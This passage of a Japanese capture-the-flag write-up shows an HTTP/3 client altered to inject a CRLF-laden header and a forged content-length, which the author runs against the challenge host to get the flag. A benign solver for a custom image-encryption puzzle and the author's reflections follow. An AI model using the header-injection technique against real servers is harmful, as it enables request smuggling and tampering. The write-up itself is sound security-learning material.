async def send(self, message: str) -> None:
"""
Send a message.
"""
assert isinstance(message, str)
data = self.websocket.send(wsproto.events.TextMessage(data=message))
self.http.send_data(stream_id=self.stream_id, data=data, end_stream=False)
self.transmit()
def http_event_received(self, event: H3Event) -> None:
if isinstance(event, HeadersReceived):
for header, value in event.headers:
if header == b"sec-websocket-protocol":
self.subprotocol = value.decode()
elif isinstance(event, DataReceived):
self.websocket.receive_data(event.data)
for ws_event in self.websocket.events():
self.websocket_event_received(ws_event)
def websocket_event_received(self, event: wsproto.events.Event) -> None:
if isinstance(event, wsproto.events.TextMessage):
self.queue.put_nowait(event.data)
class HttpClient(QuicConnectionProtocol):
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self.pushes: Dict[int, Deque[H3Event]] = {}
self._http: Optional[HttpConnection] = None
self._request_events: Dict[int, Deque[H3Event]] = {}
self._request_waiter: Dict[int, asyncio.Future[Deque[H3Event]]] = {}
self._websockets: Dict[int, WebSocket] = {}
if self._quic.configuration.alpn_protocols[0].startswith("hq-"):
self._http = H0Connection(self._quic)
else:
self._http = H3Connection(self._quic)
async def get(self, url: str, headers: Optional[Dict] = None) -> Deque[H3Event]:
"""
Perform a GET request.
"""
return await self._request(
HttpRequest(method="GET", url=URL(url), headers=headers)
)
async def post(
self, url: str, data: bytes, headers: Optional[Dict] = None
) -> Deque[H3Event]:
"""
Perform a POST request.
"""
return await self._request(
HttpRequest(method="POST", url=URL(url), content=data, headers=headers)
)
async def websocket(
self, url: str, subprotocols: Optional[List[str]] = None
) -> WebSocket:
"""
Open a WebSocket.
"""
request = HttpRequest(method="CONNECT", url=URL(url))
stream_id = self._quic.get_next_available_stream_id()
websocket = WebSocket(
http=self._http, stream_id=stream_id, transmit=self.transmit
)
self._websockets[stream_id] = websocket
headers = [
(b":method", b"CONNECT"),
(b":scheme", b"https"),
(b":authority", request.url.authority.encode()),
(b":path", request.url.full_path.encode()),
(b":protocol", b"websocket"),
(b"user-agent", USER_AGENT.encode()),
(b"sec-websocket-version", b"13"),
]
if subprotocols:
headers.append(
(b"sec-websocket-protocol", ", ".join(subprotocols).encode())
)
self._http.send_headers(stream_id=stream_id, headers=headers)
self.transmit()
return websocket
def http_event_received(self, event: H3Event) -> None:
if isinstance(event, (HeadersReceived, DataReceived)):
stream_id = event.stream_id
if stream_id in self._request_events:
# http
self._request_events[event.stream_id].append(event)
if event.stream_ended:
request_waiter = self._request_waiter.pop(stream_id)
request_waiter.set_result(self._request_events.pop(stream_id))
elif stream_id in self._websockets:
# websocket
websocket = self._websockets[stream_id]
websocket.http_event_received(event)
elif event.push_id in self.pushes:
# push
self.pushes[event.push_id].append(event)
elif isinstance(event, PushPromiseReceived):
self.pushes[event.push_id] = deque()
self.pushes[event.push_id].append(event)
def quic_event_received(self, event: QuicEvent) -> None:
# pass event to the HTTP layer
if self._http is not None:
for http_event in self._http.handle_event(event):
self.http_event_received(http_event)
async def _request(self, request: HttpRequest) -> Deque[H3Event]:
stream_id = self._quic.get_next_available_stream_id()
self._http.send_headers(
stream_id=stream_id,
headers=[
(b":method", request.method.encode()),
(b":scheme", request.url.scheme.encode()),
(b":authority", request.url.authority.encode()),
(b":path", request.url.full_path.encode()),
(b'content-length', b'100'),
(b"foo", b"bar\r\n"),
],
# + [(k.encode(), v.encode()) for (k, v) in request.headers.items()],
end_stream=not request.content,
)
if request.content:
self._http.send_data(
stream_id=stream_id, data=b'a'*100, end_stream=True
)
waiter = self._loop.create_future()
self._request_events[stream_id] = deque()
self._request_waiter[stream_id] = waiter
self.transmit()
return await asyncio.shield(waiter)
async def perform_http_request(
client: HttpClient,
url: str,
data: Optional[str],
include: bool,
output_dir: Optional[str],
) -> None:
# perform request
start = time.time()
if data is not None:
data_bytes = data.encode()
http_events = await client.post(
url,
data=data_bytes,
headers={
"content-length": str(len(data_bytes)),
"content-type": "application/x-www-form-urlencoded",
},
)
method = "POST"
else:
http_events = await client.get(url)
method = "GET"
elapsed = time.time() - start
# print speed
octets = 0
for http_event in http_events:
if isinstance(http_event, DataReceived):
octets += len(http_event.data)
logger.info(
"Response received for %s %s : %d bytes in %.1f s (%.3f Mbps)"
% (method, urlparse(url).path, octets, elapsed, octets * 8 / elapsed / 1000000)
)
# output response
if output_dir is not None:
output_path = os.path.join(
output_dir, os.path.basename(urlparse(url).path) or "index.html"
)
with open(output_path, "wb") as output_file:
write_response(
http_events=http_events, include=include, output_file=output_file
)
def process_http_pushes(
client: HttpClient,
include: bool,
output_dir: Optional[str],
) -> None:
for _, http_events in client.pushes.items():
method = ""
octets = 0
path = ""
for http_event in http_events:
if isinstance(http_event, DataReceived):
octets += len(http_event.data)
elif isinstance(http_event, PushPromiseReceived):
for header, value in http_event.headers:
if header == b":method":
method = value.decode()
elif header == b":path":
path = value.decode()
logger.info("Push received for %s %s : %s bytes", method, path, octets)
# output response
if output_dir is not None:
output_path = os.path.join(
output_dir, os.path.basename(path) or "index.html"
)
with open(output_path, "wb") as output_file:
write_response(
http_events=http_events, include=include, output_file=output_file
)
def write_response(
http_events: Deque[H3Event], output_file: BinaryIO, include: bool
) -> None:
for http_event in http_events:
if isinstance(http_event, HeadersReceived) and include:
headers = b""
for k, v in http_event.headers:
headers += k + b": " + v + b"\r\n"
if headers:
output_file.write(headers + b"\r\n")
elif isinstance(http_event, DataReceived):
output_file.write(http_event.data)
def save_session_ticket(ticket: SessionTicket) -> None:
"""
Callback which is invoked by the TLS engine when a new session ticket
is received.
"""
logger.info("New session ticket received")
if args.session_ticket:
with open(args.session_ticket, "wb") as fp:
pickle.dump(ticket, fp)
async def main(
configuration: QuicConfiguration,
urls: List[str],
data: Optional[str],
include: bool,
output_dir: Optional[str],
local_port: int,
zero_rtt: bool,
) -> None:
# parse URL
parsed = urlparse(urls[0])
assert parsed.scheme in (
"https",
"wss",
), "Only https:// or wss:// URLs are supported."
host = parsed.hostname
if parsed.port is not None:
port = parsed.port
else:
port = 443
# check validity of 2nd urls and later.
for i in range(1, len(urls)):
_p = urlparse(urls[i])
# fill in if empty
_scheme = _p.scheme or parsed.scheme
_host = _p.hostname or host
_port = _p.port or port
assert _scheme == parsed.scheme, "URL scheme doesn't match"
assert _host == host, "URL hostname doesn't match"
assert _port == port, "URL port doesn't match"
# reconstruct url with new hostname and port
_p = _p._replace(scheme=_scheme)
_p = _p._replace(netloc="{}:{}".format(_host, _port))
_p = urlparse(_p.geturl())
urls[i] = _p.geturl()
async with connect(
host,
port,
configuration=configuration,
create_protocol=HttpClient,
session_ticket_handler=save_session_ticket,
local_port=local_port,
wait_connected=not zero_rtt,
) as client:
client = cast(HttpClient, client)
if parsed.scheme == "wss":
ws = await client.websocket(urls[0], subprotocols=["chat", "superchat"])
# send some messages and receive reply
for i in range(2):
message = "Hello {}, WebSocket!".format(i)
print("> " + message)
await ws.send(message)
message = await ws.recv()
print("< " + message)
await ws.close()
else:
# perform request
coros = [
perform_http_request(
client=client,
url=url,
data=data,
include=include,
output_dir=output_dir,
)
for url in urls
]
await asyncio.gather(*coros)
# process http pushes
process_http_pushes(client=client, include=include, output_dir=output_dir)
client.close(error_code=ErrorCode.H3_NO_ERROR)
if __name__ == "__main__":
defaults = QuicConfiguration(is_client=True)
parser = argparse.ArgumentParser(description="HTTP/3 client")
parser.add_argument(
"url", type=str, nargs="+", help="the URL to query (must be HTTPS)"
)
parser.add_argument(
"--ca-certs", type=str, help="load CA certificates from the specified file"
)
parser.add_argument(
"--certificate",
type=str,
help="load the TLS certificate from the specified file",
)
parser.add_argument(
"--cipher-suites",
type=str,
help=(
"only advertise the given cipher suites, e.g. `AES_256_GCM_SHA384,"
"CHACHA20_POLY1305_SHA256`"
),
)
parser.add_argument(
"--congestion-control-algorithm",
type=str,
default="reno",
help="use the specified congestion control algorithm",
)
parser.add_argument(
"-d", "--data", type=str, help="send the specified data in a POST request"
)
parser.add_argument(
"-i",
"--include",
action="store_true",
help="include the HTTP response headers in the output",
)
parser.add_argument(
"--insecure",
action="store_true",
help="do not validate server certificate",
)
parser.add_argument(
"--legacy-http",
action="store_true",
help="use HTTP/0.9",
)
parser.add_argument(
"--max-data",
type=int,
help="connection-wide flow control limit (default: %d)" % defaults.max_data,
)
parser.add_argument(
"--max-stream-data",
type=int,
help="per-stream flow control limit (default: %d)" % defaults.max_stream_data,
)
parser.add_argument(
"--negotiate-v2",
action="store_true",
help="start with QUIC v1 and try to negotiate QUIC v2",
)
parser.add_argument(
"--output-dir",
type=str,
help="write downloaded files to this directory",
)
parser.add_argument(
"--private-key",
type=str,
help="load the TLS private key from the specified file",
)
parser.add_argument(
"-q",
"--quic-log",
type=str,
help="log QUIC events to QLOG files in the specified directory",
)
parser.add_argument(
"-l",
"--secrets-log",
type=str,
help="log secrets to a file, for use with Wireshark",
)
parser.add_argument(
"-s",
"--session-ticket",
type=str,
help="read and write session ticket from the specified file",
)
parser.add_argument(
"-v", "--verbose", action="store_true", help="increase logging verbosity"
)
parser.add_argument(
"--local-port",
type=int,
default=0,
help="local port to bind for connections",
)
parser.add_argument(
"--max-datagram-size",
type=int,
default=defaults.max_datagram_size,
help="maximum datagram size to send, excluding UDP or IP overhead",
)
parser.add_argument(
"--zero-rtt", action="store_true", help="try to send requests using 0-RTT"
)
args = parser.parse_args()
logging.basicConfig(
format="%(asctime)s %(levelname)s %(name)s %(message)s",
level=logging.DEBUG if args.verbose else logging.INFO,
)
if args.output_dir is not None and not os.path.isdir(args.output_dir):
raise Exception("%s is not a directory" % args.output_dir)
# prepare configuration
configuration = QuicConfiguration(
is_client=True,
alpn_protocols=H0_ALPN if args.legacy_http else H3_ALPN,
congestion_control_algorithm=args.congestion_control_algorithm,
max_datagram_size=args.max_datagram_size,
)
if args.ca_certs:
configuration.load_verify_locations(args.ca_certs)
if args.cipher_suites:
configuration.cipher_suites = [
CipherSuite[s] for s in args.cipher_suites.split(",")
]
if args.insecure:
configuration.verify_mode = ssl.CERT_NONE
if args.max_data:
configuration.max_data = args.max_data
if args.max_stream_data:
configuration.max_stream_data = args.max_stream_data
if args.negotiate_v2:
configuration.original_version = QuicProtocolVersion.VERSION_1
configuration.supported_versions = [
QuicProtocolVersion.VERSION_2,
QuicProtocolVersion.VERSION_1,
]
if args.quic_log:
configuration.quic_logger = QuicFileLogger(args.quic_log)
if args.secrets_log:
configuration.secrets_log_file = open(args.secrets_log, "a")
if args.session_ticket:
try:
with open(args.session_ticket, "rb") as fp:
configuration.session_ticket = pickle.load(fp)
except FileNotFoundError:
pass
# load SSL certificate and key
if args.certificate is not None:
configuration.load_cert_chain(args.certificate, args.private_key)
if uvloop is not None:
uvloop.install()
asyncio.run(
main(
configuration=configuration,
urls=args.url,
data=args.data,
include=args.include,
output_dir=args.output_dir,
local_port=args.local_port,
zero_rtt=args.zero_rtt,
)
)
これでペイロードを送信する準備が出来ました.
最後に python3 http3_client.py --insecure -d aaa --output-dir . https://sunshine.ctf
と実行し, index.html
を見ると flag が得られます!
レスポンスも,予想した通りのものになっています.
以上です.
後半の,実際に CRLF インジェクションを含んだペイロードを送る所が最もつまった箇所でした.
それが出来るようになった時点でかなり大会終了が近づいており,最初に疑似ヘッダーで試してダメだった後,とりあえずと通常ヘッダーでも試してみたところいけた,という感じでした.
HTTP/3 に直接触れるいい機会になり,とても楽しかったです.
Misc
[Medium] Decrypt
独自の方式で暗号化された16枚の画像ファイルが与えられるのでそれらを復号化する問題.
README.pdf に暗号化方式の詳細が書いてあります.
基本的には暗号化の逆操作を丁寧に実装していけば良いです.
ただしパディングについて注意しなくてはなりません.
暗号化の際,データが必要な長さに足りない場合適宜パディングされます.
しかしこのパディングの長さが暗号化されたデータからは一意に特定出来ない為,パディングの長さを全探索する必要があります.
パディングは暗号化アルゴリズムにおける手順1,2,5の三ヶ所で行われ,あり得るパディングの長さはそれぞれ,0 以上「鍵4」未満, 0 以上「鍵4」未満, 0 以上 8 未満です.
従ってこれらの範囲を全探索します.
幸い,与えられるファイルの「鍵4」の値は高々 14 なので,殆ど時間はかかりません.
(仕様上「鍵4」の最大値は 65535 っぽいのですが,この場合探索範囲が 34359738368 通りになり,かなり時間がかかりそうです.)
詳しくは以下の復号化コードを参照してください.
decrypt.py
import struct
from Crypto.Cipher import AES
from Crypto.Util import Padding
def encrypt_aes(key, data):
cipher = AES.new(key=key, mode=AES.MODE_CBC, iv=key)
return cipher.encrypt(Padding.pad(data, AES.block_size, "pkcs7"))
def decrypt_aes(key, data):
cipher = AES.new(key=key, mode=AES.MODE_CBC, iv=key)
return Padding.unpad(cipher.decrypt(data), AES.block_size, "pkcs7")
def byte_to_array(data, size, padding):
ret_size = (8 * len(data) - padding) // size # 返す array のサイズ
ret = []
buf = 0
buf_bitsize = 0
cnt = 0
for _ in range(ret_size):
while buf_bitsize < size:
buf += data[cnt] * pow(2, buf_bitsize)
buf_bitsize += 8
cnt += 1
ret.append(buf % pow(2, size))
buf //= pow(2, size)
buf_bitsize -= size
return ret
def array_to_byte(arr, size, padding):
ret_size = (size * len(arr) - padding) // 8 # 返す byte の長さ
ret = b""
buf = 0
buf_bitsize = 0
cnt = 0
for _ in range(ret_size):
while buf_bitsize < 8:
buf += arr[cnt] * pow(2, buf_bitsize)
buf_bitsize += size
cnt += 1
ret += (buf % pow(2, 8)).to_bytes(1, "little")
buf //= pow(2, 8)
buf_bitsize -= 8
return ret
def conv_2d(arr, row_size):
arr.extend([0] * ((row_size - len(arr)) % row_size))
data = []
for i in range(0, len(arr), row_size):
data.append(arr[i : i + row_size])
return data
def conv_1d(data, padding):
arr = []
for y in range(len(data)):
for x in range(len(data[0])):
arr.append(data[y][x])
arr = arr[: len(arr) - padding] # padding 分を削除
return arr
def generate_key(a0, a1, n, bit_size):
mod = pow(2, bit_size)
dp = [0 for _ in range(n + 1)]
dp[0] = a0 % mod
dp[1] = a1 % mod
for i in range(n - 1):
dp[i + 2] = (dp[i + 1] + dp[i]) % mod
return dp[n]
def decrypt_round(arr, key_a, key4):
xsize = len(arr)
key_a = (pow(2, key4) - 1) ^ key_a
for _ in range(10):
new_arr = [[0] * key4 for _ in range(xsize)]
for x in range(xsize):
for y in range(key4):
new_arr[x][y] = arr[(x + y) % xsize][y]
arr = new_arr
new_arr = [[0] * key4 for _ in range(xsize)]
for x in range(xsize):
for y in range(key4):
new_arr[x][y] = arr[x][(y + x) % key4]
arr = new_arr
for i in range(xsize // 2):
for j in range(key4):
if (key_a >> j) & 1:
arr[2 * i][j], arr[2 * i + 1][j] = arr[2 * i + 1][j], arr[2 * i][j]
key_a = (pow(2, key4) - 1) ^ key_a
return arr
def decrypt(data, key_a, key4, padding_1, padding_2, padding_5):
if (8 * len(data) - padding_5) % key4 != 0:
raise Exception # padding の長さが不適
arr1 = byte_to_array(data, key4, padding_5)
arr2d_1 = conv_2d(arr1, key4)
arr2d_2 = decrypt_round(arr2d_1, key_a, key4)
arr2 = conv_1d(arr2d_2, padding_2)
if (key4 * len(arr2) - padding_1) % 8 != 0:
raise Exception # padding の長さが不適
byte2 = array_to_byte(arr2, key4, padding_1)
return byte2
def unpack_meta(data):
key1, key2, key3, key4, size = struct.unpack("<IIHHI", data[:16])
return key1, key2, key3, key4, data[16:32], size
def decrypt_file(src_path, dst_path):
with open(src_path, "rb") as f:
data = f.read()
key1, key2, key3, key4, key5, size = unpack_meta(data)
data = data[32:]
key_a = generate_key(key1, key2, key3, key4)
dec1 = decrypt_aes(key5, data)
for padding_1 in range(key4): # 処理1における padding の長さ
for padding_2 in range(key4): # 処理2における padding の長さ
for padding_5 in range(8): # 処理5における padding の長さ
try:
dec2 = decrypt(dec1, key_a, key4, padding_1, padding_2, padding_5)
dec3 = decrypt_aes(key5, dec2)
with open(dst_path, "wb") as f:
f.write(dec3)
return 1
except:
pass
return 0
for i in range(16):
print(f"Decrypting {i}.enc...", end="", flush=True)
if decrypt_file(f"{i}.enc", f"{i}.enc.png"):
print("Done")
else:
print("Error")
最後に
準優勝出来るとは全く思っていなかったので,とても嬉しかったです!
しかし分からなかった問題や時間が無く解ききれなかった問題もあったので,そこが心残りです.
特に Misc の Easy 問 "Swifty" を解けなかったのが悔しい所ですね.
README 通りに環境構築等行ったのですが,Ghidra の結果を見ても動作の詳細が分からず,GDB によるデバッグも困難でお手上げ状態でした.
また Malware Analysis についてもまだほどんど勉強した事がなく,何とか Easy は解くことができましたが他はまだ解けて無いので,入門して upsolve したい所です.
Malware Analysis は以前から興味は非常に大きかったのですが中々始めるきっかけが無かったので、今回を機に勉強してみようと思います.
(おすすめの入門法があれば教えてください m(_ _)m)
解いていて楽しい問題ばかりで,学びも多く,本当に参加して良かったです.
改めて,ありがとうございました!